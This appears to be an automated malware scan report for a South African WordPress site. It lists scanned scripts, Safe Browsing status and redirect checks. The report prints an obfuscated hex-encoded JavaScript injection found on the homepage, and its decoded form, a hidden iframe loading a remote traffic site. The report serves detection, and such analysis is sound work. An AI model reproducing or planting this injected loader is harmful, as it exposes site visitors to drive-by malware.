Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bridgestreet.co.za
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bridgestreet.co.za/ | 200 OK Content-Length: 31573 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v52cf7332b711f(v52cf7332b7159){ function v52cf7332b7194 () {var v52cf7332b71ce=16; return v52cf7332b71ce;} return(parseInt(v52cf7332b7159,v52cf7332b7194()));}function v52cf7332b7204(v52cf7332b725a){ var v52cf7332b7296='';for(v52cf7332b72ce=0; v52cf7332b72ce<v52cf7332b725a.length; v52cf7332b72ce+=2){ v52cf7332b7296+=(String.fromCharCode(v52cf7332b711f(v52cf7332b725a.substr(v52cf7332b72ce, 2))));}return v52cf7332b7296;} document.write(v52cf7332b7204('3C696672616D65206E616D653D273527207372633D27687474703A2F2F616C6C2D74726166662E636F6D2F74722E706870272077696474683D363734206865696768743D323830207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='5' src='http://all-traff.com/tr.php' width=674 height=280 style='display:none'></iframe> Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js?ver=1.6.2 | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/supersized.js?ver=3.3.2 | 200 OK Content-Length: 18606 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/supersized.shutter.js?ver=3.3.2 | 200 OK Content-Length: 7414 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/easing.js?ver=3.3.2 | 200 OK Content-Length: 8698 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/sticky.js?ver=3.3.2 | 200 OK Content-Length: 1940 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/datepicker.js?ver=3.3.2 | 200 OK Content-Length: 36708 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/tweet.js?ver=3.3.2 | 200 OK Content-Length: 4183 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/prettyphoto.js?ver=3.3.2 | 200 OK Content-Length: 23534 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/form.js?ver=3.3.2 | 200 OK Content-Length: 24233 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/validate.js?ver=3.3.2 | 200 OK Content-Length: 21129 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-content/themes/bsb/bridge/js/custom.js?ver=3.3.2 | 200 OK Content-Length: 1446 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() {
jQuery('.image-overlay a').hover(function() { jQuery(this).find('span').stop(false,true).fadeIn(400); }, function() { jQuery(this).find('span').stop(false,true).fadeOut(200); }); }); jQuery(document).ready(function(){ jQuery("a[data-rel^='prettyPhoto']").prettyPhoto(); }); jQuery(document).ready(function(){ jQuery("a[rel^='prettyPhoto']").prettyPhoto(); }); jQuery(document).ready(function() { jQuery(".scroll").cli submenu.fadeOut(300); } else { submenu.fadeIn(300); } }); var submenu_active = false; jQuery('nav.navigation-mobile .menu').mouseenter(function() { submenu_active = true; }); jQuery('nav.navigation-mobile .menu').mouseleave(function() { submenu_active = true; setTimeout(function() { if (submenu_active === false) jQuery('nav.navigation-mobile .menu').fadeOut(); }, 400); }); }); Antivirus reports:
| ||
http://bridgestreet.co.za/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/x-javascript | clean |
http://bridgestreet.co.za/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.8.16 | 200 OK Content-Length: 4365 Content-Type: application/x-javascript | clean |
http://www.bridgestreet.co.za/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bridgestreet.co.za
Result:
GET / HTTP/1.1
Host: bridgestreet.co.za
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bridgestreet.co.za
Referer: http://www.google.com/search?q=bridgestreet.co.za
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bridgestreet.co.za
Referer: http://www.google.com/search?q=bridgestreet.co.za
Result:
The result is similar to the first query. There are no suspicious redirects found.